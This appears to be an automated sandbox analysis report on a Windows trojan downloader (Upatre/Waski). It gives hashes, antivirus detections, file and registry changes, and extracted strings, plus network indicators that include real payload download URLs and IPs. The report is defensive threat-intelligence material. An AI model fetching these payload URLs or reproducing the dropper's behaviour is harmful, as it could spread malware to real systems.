Analysis Date: 2014-11-04 07:24:11
MD5: a305563faf7e91daeb6006bbedc923dc
SHA1: 70e6e69a4e7e6ba5f5f79a6c512af3b98a8830b5

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1cfe640fb916f9e71e2f42ce9463b6e6 sha1: d3cefe831eba88d17380b6e877f968ab01e72878 size: 6144
Section.rdata md5: 5991a0937ea1c73a6ea7d2b50760dccf sha1: b09ba9081a37296905432830e2b7a3f680249f52 size: 1536
Section.data md5: 36f425ac30a34478057dae27a1407f15 sha1: 27c149c9c2f3499e5e8e775de3eeba3e88845640 size: 512
Section.rsrc md5: d312230fc901e21ad5d01f3359ba6e14 sha1: 9a3ea68fc338ca5068121b66142c23539c4c2819 size: 10240
Section.reloc md5: 5941791c6b31ac52e41a5ea0912259d3 sha1: 953eb4ea14eb81b605c22a5b1c6a2a709e64de33 size: 512
Timestamp: 2014-02-05 03:55:00
PEhash: b6248038e0af3e67a33a86bcc7288619ab5ee56f
IMPhash: 7772dfa3e3a72b92db47c13e7be36e20
AV 360 Safe: Trojan.GenericKD.1559549
AV Ad-Aware: Trojan.GenericKD.1559549
AV Alwil (avast): Zbot-TCT [Trj]
AV Arcabit (arcavir): Trojan.Downloader.Agent.dtfw
AV Authentium: W32/Trojan.QXZZ-7823
AV Avira (antivir): TR/Yarwi.B.176
AV BullGuard: Trojan.GenericKD.1559549
AV CA (E-Trust Ino): Win32/Tnega.GXNWZHB
AV CAT (quickheal): TrojanDownloader.Upatre.A4
AV ClamAV: Win.Trojan.Generickd-68
AV Dr. Web: Trojan.DownLoad3.28161
AV Emsisoft: Trojan.GenericKD.1559549
AV Eset (nod32): Win32/TrojanDownloader.Waski.A
AV Fortinet: W32/Waski.AC!tr
AV Frisk (f-prot): W32/Trojan3.HKY
AV F-Secure: Trojan.GenericKD.1559549
AV Grisoft (avg): Generic35.BQYO
AV Ikarus: Trojan-Downloader.Win32.Upatre
AV K7: Trojan ( 0040f71e1 )
AV Kaspersky: Trojan-Downloader.Win32.Injecter.jiq
AV MalwareBytes: Trojan.Downloader.Upatre
AV Mcafee: Downloader-FSH!A305563FAF7E
AV Microsoft Security Essentials: TrojanDownloader:Win32/Upatre.L
AV MicroWorld (escan): Trojan.GenericKD.1559549
AV Norman: Trojan.GenericKD.1559549
AV Rising: no_virus
AV Sophos: Troj/Upatre-S
AV Symantec: Downloader.Upatre
AV Trend Micro: TROJ_UPATRE.TZE
AV VirusBlokAda (vba32): TrojanDownloader.Injecter

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: bsitacademy.com
Winsock DNS: wahidexpress.com

Network Details:

DNS: bsitacademy.com
Type: A
107.150.48.43
DNS: wahidexpress.com
Type: A
103.15.74.65
HTTP GET: http://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GET: http://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
HTTP GET: http://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GET: http://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
Flows TCP: 192.168.1.1:1031 ➝ 107.150.48.43:80
Flows TCP: 192.168.1.1:1032 ➝ 103.15.74.65:80
Flows TCP: 192.168.1.1:1033 ➝ 107.150.48.43:80
Flows TCP: 192.168.1.1:1034 ➝ 103.15.74.65:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..


Strings
l
\1.scr
C:\0ySzT4aT.exe
C:\0yXoJdS1.exe
C:\1f04c58cd64f1d992946720933171aa86f1f15c1c57d0d66f7a3dfd0d1cf617c
C:\1H6_lcAf.exe
C:\1XVNiGRb.exe
C:\38116e45cf11c9def2c37fa30e06bc018e46cd9bf891a785b5ba6a5923323d5d
C:\487b40f83626767b4ac5984e18d98f99fb4a29a855746e349fe73a0c83ec2ca3
C:\4OAw6dNj.exe
C:\4vHknKs7.exe
C:\8iD2xfe3.exe
C:\94clNag9.exe
C:\9R9GxndA.exe
C:\9Z3DNRt6.exe
C:\a34bkNIn.exe
C:\A94aUTod.exe
C:\aIUbH0QM.exe
C:\AOYSy6MC.exe
C:\bKje2IhZ.exe
C:\d7143680a75410278c9b95484bc00b271fcf34c23bd0de80aeec3cea7d6cedbc
C:\D7QkO4t7.exe
C:\Documents and Settings\Administrator\
C:\hcF7eCU6.exe
C:\hG3OL4IM.exe
C:\j2mY72oN.exe
C:\Jk2nLpP3.exe
C:\jUWj7TOq.exe
C:\kYD8fnKP.exe
C:\LiAKcAF0.exe
C:\LioP7mJk.exe
C:\mMu0FlJa.exe
C:\N6oieXD9.exe
C:\n7URlBKs.exe
C:\pFwvJXru.exe
C:\q7VSfGFe.exe
C:\qFCCRxHi.exe
C:\qgX_3bi5.exe
C:\qYxqpebq.exe
C:\rrrNORCR.exe
C:\tDiWugjj.exe
C:\TMtk4JD7.exe
C:\UowVcj_v.exe
C:\uxk8IO6h.exe
C:\Vh70EiAi.exe
C:\vP2nEv_R.exe
C:\w5V0zrq2.exe
C:\Wo_R3fMU.exe
C:\xfqsWlNO.exe
C:\xPNihfHa.exe
C:\XPO1cNIb.exe
C:\YPkfVKVq.exe
C:\Ywr6ilYL.exe
C:\zm1Dwebw.exe
:	;);4;
4%5*5N5U5\5c5i5q5w5~5
5%6I6Y6y6
7%7*7/7?7J7X7^7
7D9Y9^9h9n9w9
absent
_acmdln
_adjust_fdiv
Africa
AhAuhh
AWVAf9
Bagdad
BeginPaint
button
COMCTL32.dll
_controlfp
CreateFileA
CreateWindowExA
:D,*~aB?
@.data
DefWindowProcA
DispatchMessageA
DragQueryFileA
EndPaint
_except_handler3
GDI32.dll
__getmainargs
GetMessageA
GetModuleHandleA
GetStartupInfoA
;H7-G@
hAAhAA
InitCommonControlsEx
_initterm
iRichu
k{.cee
KERNEL32.dll
KXG[O_
lantie
MSVCRT.dll
 ';(&NK:&]9
o7U"o7U"
__p__commode
__p__fmode
PostQuitMessage
PuZN=0
`.rdata
RegisterClassA
@.reloc
SendMessageA
__set_app_type
__setusermatherr
SHELL32.dll
ShowWindow
solienty
static
TextOutA
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateMessage
uAhhAhA
USER32.dll
_XcptFilter
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo></assembly>(